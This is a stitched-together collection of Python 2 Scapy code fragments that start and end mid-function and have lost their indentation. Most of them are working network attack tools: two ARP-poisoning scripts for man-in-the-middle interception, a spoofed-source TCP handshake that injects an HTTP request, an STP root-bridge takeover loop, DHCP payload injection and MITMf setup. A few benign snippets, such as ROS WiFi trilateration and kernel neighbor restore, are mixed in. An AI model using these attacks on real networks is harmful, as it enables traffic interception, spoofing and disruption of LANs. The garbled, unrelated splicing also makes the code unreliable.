pkt=srp1(packet, iface=inter, verbose=1)
if BOOTP in pkt:
is_DHCP(pkt)
#sniff(prn=is_DHCP, filter="udp and (port 67 or 68)", iface=inter
except KeyboardInterrupt:
pass
def send_random_traffic(dst):
dst_mac = None
dst_ip = None
src_mac = [get_if_hwaddr(i) for i in get_if_list() if i == 'eth0']
if len(src_mac) < 1:
print ("No interface for output")
sys.exit(1)
src_mac = src_mac[0]
src_ip = None
if src_mac =="00:00:00:00:00:01":
src_ip = "10.0.0.1"
elif src_mac =="00:00:00:00:00:02":
src_ip = "10.0.0.2"
elif src_mac =="00:00:00:00:00:03":
src_ip = "10.0.0.3"
else:
print ("Invalid source host")
sys.exit(1)
if dst == 'h1':
dst_mac = "00:00:00:00:00:01"
dst_ip = "10.0.0.1"
elif dst == 'h2':
dst_mac = "00:00:00:00:00:02"
dst_ip = "10.0.0.2"
elif dst == 'h3':
dst_mac = "00:00:00:00:00:03"
dst_ip = "10.0.0.3"
else:
print ("Invalid host to send to")
sys.exit(1)
total_pkts = 0
random_ports = random.sample(xrange(1024, 65535), 10)
for port in random_ports:
num_packets = random.randint(50, 250)
for i in range(num_packets):
data = randomword(100)
p = Ether(dst=dst_mac,src=src_mac)/IP(dst=dst_ip,src=src_ip)
p = p/TCP(dport=port)/Raw(load=data)
print p.show()
sendp(p, iface = "eth0")
total_pkts += 1
print "Sent %s packets in total" % total_pkts
def main():
"""
:return: void
"""
# handle args
parser = argparse.ArgumentParser()
parser.add_argument('-src', help="Source IP")
parser.add_argument('-dst', help="Destination IP")
parser.add_argument('-msg', help="HTTP message")
args = parser.parse_args()
fake_src_ip = args.src
dst_ip = args.dst
http_get_msg = "GET / HTTP/1.1\r\n" + args.msg + "\r\n\r\n"
# get my mac address
my_mac = '00:00:00:00:00:00'
my_macs = [get_if_hwaddr(i) for i in get_if_list()]
for macs in my_macs:
if macs != '00:00:00:00:00:00':
my_mac = macs
# Arp posion
arp_psn = Ether() / ARP(op="who-has", hwsrc=my_mac,
pdst=dst_ip, psrc=fake_src_ip)
sendp(arp_psn)
# Hand Shake
ip_layer = IP(src=fake_src_ip, dst=dst_ip)
tcp_layer = TCP(dport=PORT, seq=100, flags='S')
syn_pkg = ip_layer / tcp_layer
syn_ack_pkg = sr1(syn_pkg)
if syn_ack_pkg != 0:
ip_layer = IP(src=fake_src_ip, dst=dst_ip)
tcp_layer = TCP(dport=PORT, seq=syn_ack_pkg[TCP].ack,
ack=(syn_ack_pkg[TCP].seq + 1), flags='A')
ack_pkg = ip_layer / tcp_layer
send(ack_pkg)
ack_pkg /= http_get_msg
send(ack_pkg)
def run(interface):
"""
This function launch STP TCN ATTACK
:param interface: interface to be launched the attack
:type interface: str
"""
# sniff to found a stp packet
pkt = sniff(stop_filter=lambda x: x.haslayer(STP), iface=interface)
# Look for a STP packet to use a lower priority
pk_list={x:y for x,y in pkt.sessions().iteritems() if "Other" in x}
item=pk_list.popitem()
pkts = item[1]
for x in pkts:
if STP in x:
STP_packet = x
break
myMAC = get_if_hwaddr(interface)
root_id = STP_packet.rootid - 1
bridge_id = STP_packet.bridgeid - 1
p_ether = Dot3(dst="01:80:c2:00:00:00", src=myMAC)
p_llc = LLC()
p_stp = STP(bpdutype=0x00, bpduflags=0x01, portid=0x8002, rootmac=myMAC, bridgemac=myMAC,
rootid=root_id, bridgeid=bridge_id)
pkt = p_ether/p_llc/p_stp # STP packet structure
try:
while 1:
sendp(pkt, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def restore_update_kernel_neighbors(intf_neigh_map, timeout=DEF_TIME_OUT):
# create object for netlink calls to kernel
ipclass = IPRoute()
mtime = monotonic.time.time
start_time = mtime()
while (mtime() - start_time) < timeout:
for intf, family_neigh_map in intf_neigh_map.items():
# only try to restore to kernel when link is up
if is_intf_oper_state_up(intf):
src_mac = get_if_hwaddr(intf)
intf_idx = ipclass.link_lookup(ifname=intf)[0]
# create socket per intf to send packets
s = conf.L2socket(iface=intf)
# Only two families: 'IPv4' and 'IPv6'
for family in ip_family.keys():
# if ip address assigned and if we have neighs in this family, restore them
src_ip = first_ip_on_intf(intf, family)
if src_ip and (family in family_neigh_map):
neigh_list = family_neigh_map[family]
for dst_ip, dmac in neigh_list:
# use netlink to set neighbor entries
set_neigh_in_kernel(ipclass, family, intf_idx, dst_ip, dmac)
# sending arp/ns packet to update kernel neigh info
s.send(build_arp_ns_pkt(family, src_mac, src_ip, dst_ip))
# delete this family on the intf
del intf_neigh_map[intf][family]
# close the pkt socket
s.close()
# if all families are deleted, remove the key
if len(intf_neigh_map[intf]) == 0:
del intf_neigh_map[intf]
# map is empty, all neigh entries are restored
if not intf_neigh_map:
break
time.sleep(CHECK_INTERVAL)
def findSelfPos(self, event):
mac = get_if_hwaddr(self.interface)
servers = self.client.discover()
while(len(servers) < 3):
rospy.loginfo("Found only " + str(len(servers)) + " servers!")
return
otherServers = [x for x in servers if x.find(self.robotName) == -1]
# This will call the other servers' WiFiTrilatServices. To do this, we enter our own MAC address,
# then take two servers that are NOT ours.
responses = self.client.getDistances(mac, otherServers, time.time(), 50)
#goodServers = [x.srv_name for x in responses if x.distance != -1]
goodResponses = [x for x in responses if x.distance != -1]
for x in responses:
print x.srv_name
print x.distance
goodServers = [x.srv_name for x in goodResponses]
if len(goodServers) < 2:
rospy.loginfo("Not enough servers!")
return
srvToUse = []
for x in goodServers:
srvToUse.append(x)
srvToUse.append(self.robotName)
srvToUse = sorted(srvToUse)
#serverNames = sorted([s[1:s.find('/WiFi')] for s in servers])
index = srvToUse.index(self.robotName)
# Next we need to find the distance between the two other servers
print "Host 0 is " + goodServers[0]
print "Host 1 is " + goodServers[1]
goodResponses.append(self.client.getDistances(self.client.IPtoMAC(self.client.hostToIP(goodServers[0])), ["/" + goodServers[1] + "/WiFiTrilat"])[0])
# We translate the indices, so each server will end up building the same triangle.
indexTrans = [(0, 2, 1), (0, 1, 2), (2, 1, 0)]
myInd = indexTrans[index]
# We take our relative position based on alphabetical order.
try:
[self.x, self.y] = wifiutils.calcFrameOfRef(goodResponses[myInd[0]].distance, goodResponses[myInd[1]].distance, goodResponses[myInd[2]].distance)[index]
except ValueError as e:
rospy.logwarn(str(e))
return
print self.x
print self.y
if self.discoverOnce:
rospy.loginfo("Position resolved; shutting down heartbeat/findpos")
self.discoverTimer.shutdown()
self.heartbeat.shutdown()
def main():
if os.geteuid() != 0:
print "[-] Run me as root"
sys.exit(1)
usage = 'Usage: %prog [-i interface] [-t target] host'
parser = OptionParser(usage)
parser.add_option('-i', dest='interface', help='Specify the interface to use')
parser.add_option('-t', dest='target', help='Specify a particular host to ARP poison')
parser.add_option('-m', dest='mode', default='req', help='Poisoning mode: requests (req) or replies (rep) [default: %default]')
parser.add_option('-s', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
(options, args) = parser.parse_args()
if len(args) != 1 or options.interface is None:
parser.print_help()
sys.exit(0)
mac = get_if_hwaddr(options.interface)
def build_req():
if options.target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
return pkt
def build_rep():
if options.target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], op=2)
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target, op=2)
return pkt
def rearp(signal, frame):
sleep(1)
print '\n[*] Re-arping network'
rearp_mac = getmacbyip(args[0])
pkt = Ether(src=rearp_mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=args[0], hwsrc=mac, op=2)
sendp(pkt, inter=1, count=5, iface=options.interface)
sys.exit(0)
signal.signal(signal.SIGINT, rearp)
if options.mode == 'req':
pkt = build_req()
elif options.mode == 'rep':
pkt = build_rep()
if options.summary is True:
pkt.show()
ans = raw_input('\n[*] Continue? [Y|n]: ').lower()
if ans == 'y' or len(ans) == 0:
pass
else:
sys.exit(0)
while True:
sendp(pkt, inter=2, iface=options.interface)
def get_mac(interface):
try:
mac_address = get_if_hwaddr(interface)
return mac_address
except Exception as e:
shutdown("Error retrieving MAC address from {}: {}".format(interface, e))
if os.geteuid() != 0:
exit("You need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.")
# Suppress annoying warnings about IPv6
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# Load specific modules from scapy
try:
from scapy.all import srp,Ether,ARP,conf,get_if_hwaddr
except:
print "please install scapy (correctly) first"
exit(1)
# Use valid hwaddr, even if the NIC is not up
macaddress=get_if_hwaddr(sys.argv[2])
# Set to False if you would like to only have the "CSV" output to console
debug = True
# Select output type to console
if debug:
conf.verb=4
else:
conf.verb=0
# Send to Ether.dst broadcast, from our MAC (both Ether.src and ARP.hwsrc),
# to ARP.hwdst broadcast from IP ARP.psrc 0.0.0.0
# looking from all IP's in given range
ans,unans=srp(Ether(src=macaddress,dst="ff:ff:ff:ff:ff:ff")/ARP(hwsrc=macaddress,hwdst="00:00:00:00:00:00",psrc="0.0.0.0",pdst=sys.argv[1]),
timeout=2,iface=str(sys.argv[2]),inter=0.1)
for arg in config_args.split(' '):
sys.argv.append(arg)
args = parser.parse_args()
####################################################################################################
# Here we check for some variables that are very commonly used, and pass them down to the plugins
try:
args.ip_address = get_if_addr(args.interface)
if (args.ip_address == "0.0.0.0") or (args.ip_address is None):
sys.exit("[-] Interface %s does not have an assigned IP address" % args.interface)
except Exception, e:
sys.exit("[-] Error retrieving interface IP address: %s" % e)
try:
args.mac_address = get_if_hwaddr(args.interface)
except Exception, e:
sys.exit("[-] Error retrieving interface MAC address: %s" % e)
args.configfile = configfile #so we can pass the configobj down to all the plugins
####################################################################################################
log_level = logging.__dict__[args.log_level.upper()]
#Start logging
logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
logFormatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
mitmf_logger = logging.getLogger('mitmf')
fileHandler = logging.FileHandler("./logs/mitmf.log")
help='interface to use')
parser.add_argument('type',
choices=['discover', 'offer', 'request', 'ack'],
help='DHCP message type (for Ether and IP layers setup)')
parser.add_argument('hexpayload',
help='hexadecimal payload')
args = parser.parse_args()
if args.transactionid:
if len(args.hexpayload) < 16:
argparse.error("Payload too short to modify transaction id")
args.hexpayload = args.hexpayload[:8] + "%.8x" % args.transactionid + args.hexpayload[16:]
print("Modified payload with transaction id:\n%s" % args.hexpayload)
if args.type == 'discover' or args.type == 'request':
pkt = scapy.Ether(src=scapy.get_if_hwaddr(args.iface), dst="ff:ff:ff:ff:ff:ff") \
/ scapy.IP(src="0.0.0.0", dst="255.255.255.255") \
/ scapy.UDP(sport=68, dport=67) \
/ binascii.a2b_hex(args.hexpayload)
elif args.type == 'offer' or args.type == 'ack':
pkt = scapy.Ether(src=scapy.get_if_hwaddr(args.iface), dst="ff:ff:ff:ff:ff:ff") \
/ scapy.IP(src=scapy.get_if_addr(args.iface), dst="255.255.255.255") \
/ scapy.UDP(sport=67, dport=68) \
/ binascii.a2b_hex(args.hexpayload)
print("[+] Sending payload")
ans, unans = scapy.srp(pkt, iface=args.iface, timeout=2)
print("ans: %s" % ans)
print("unans: %s" % unans)
def main():
if os.geteuid() != 0:
print "[-] Run me as root"
sys.exit(1)
usage = 'Usage: %prog [-i interface] [-t target] host'
parser = OptionParser(usage)
parser.add_option('-i', dest='interface', help='Specify the interface to use')
parser.add_option('-t', dest='target', help='Specify a particular host to ARP poison')
parser.add_option('-r', action='store_true', dest='reverse', help='Poison both target and host (bidirectional spoofing). Only valid in conjunction with -t.')
parser.add_option('-m', dest='mode', default='req', help='Poisoning mode: requests (req) or replies (rep) [default: %default]')
parser.add_option('-s', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
(options, args) = parser.parse_args()
if len(args) != 1 or options.interface is None:
parser.print_help()
sys.exit(0)
host = args[0]
mac = get_if_hwaddr(options.interface)
def get_target_mac_by_ip(target):
print ("[*] Resolving target's mac address. If this takes more than"
" a few seconds, check if the target can be reached on the network.")
target_mac = getmacbyip(target)
while not target_mac:
target_mac = getmacbyip(target)
print "[*] Success!"
return target_mac
def build_req(target, host):
if target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=host, pdst=host)
elif options.target:
target_mac = get_target_mac_by_ip(target)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=host, hwdst=target_mac, pdst=target)
return pkt
def build_rep(target, host):
if target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=host, op=2)
elif target:
target_mac = get_target_mac_by_ip(target)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=host, hwdst=target_mac, pdst=target, op=2)
return pkt
def rearp(signal, frame):
sleep(1)
print '\n[*] Re-arping network'
rearp_mac = getmacbyip(host)
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=host, hwsrc=rearp_mac, op=2)
sendp(pkt, inter=1, count=5, iface=options.interface)
if options.reverse:
r_rearp_mac = getmacbyip(options.target)
r_pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=options.target, hwsrc=r_rearp_mac, op=2)
sendp(r_pkt, inter=1, count=5, iface=options.interface)
sys.exit(0)
signal.signal(signal.SIGINT, rearp)
if options.mode == 'req':
pkt = build_req(options.target, host)
elif options.mode == 'rep':
pkt = build_rep(options.target, host)
if options.reverse:
if options.mode == 'req':
r_pkt = build_req(host, options.target)
elif options.mode == 'rep':
r_pkt = build_rep(host, options.target)
if options.summary:
pkt.show()
r_pkt.show()
ans = raw_input('\n[*] Continue? [Y|n]: ').lower()
if ans == 'y' or len(ans) == 0:
pass
else:
sys.exit(0)
while True:
sendp(pkt, inter=2, iface=options.interface)
if options.reverse:
sendp(r_pkt, iface=options.interface)
